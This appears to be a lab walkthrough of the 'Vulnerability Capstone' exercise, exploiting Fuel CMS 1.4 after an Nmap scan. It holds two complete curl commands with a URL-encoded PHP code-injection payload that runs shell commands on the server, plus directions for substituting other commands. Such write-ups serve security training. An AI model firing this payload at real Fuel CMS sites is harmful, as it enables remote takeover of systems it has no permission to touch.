Vulnerability Capstone Walk-through

Let’s Boot up the machine

Vulnerability Capstone IP

now let’s start Nmap Scan

Nmap Scan

By Nmap Scan we discovered PORT 22 and 80 is running so let’s visit website running on port 80

FUEL CMS

by visiting the website we discovered it running FULE CMS (Content management system) with its version number so let’s search it (Fuel CMS 1.4) on exploit-db for available exploit

Fuel CMS 1.4 RCE exploit
RCE payload

the main thing we need is the above payload Let’s craft payload to run whoami command with available exploit

curl -g -s “10.10.188.18/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami%27%29%2b%27”| sed -n ‘47,500p’ | tr “>” “\n” | grep -vE “<p|</p|h4|<div|br|</div” | awk NF | tail -n 60 | sed ‘s/^system$/ /g’ | sort -u
The Result

for getting the flag we need to replace whoami with different command with URL encoded we can use this website CyberChef to encode command in URL encoded

Let’s list /home/ubuntu directory to list content

command ls /home/ubuntu

url encoded ls%20/home/ubuntu

URL encoded

replace whoami with ls%20/home/ubuntu

curl -g -s “10.10.188.18/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%20/home/ubuntu%27%29%2b%27”| sed -n ‘47,500p’ | tr “>” “\n” | grep -vE “<p|</p|h4|<div|br|</div” | awk NF | tail -n 60 | sed ‘s/^system$/ /g’ | sort -u
flag location

with similar steps now cat the flag to read the content of it

Thank you so much for reading, Happy hacking, and happy learning!!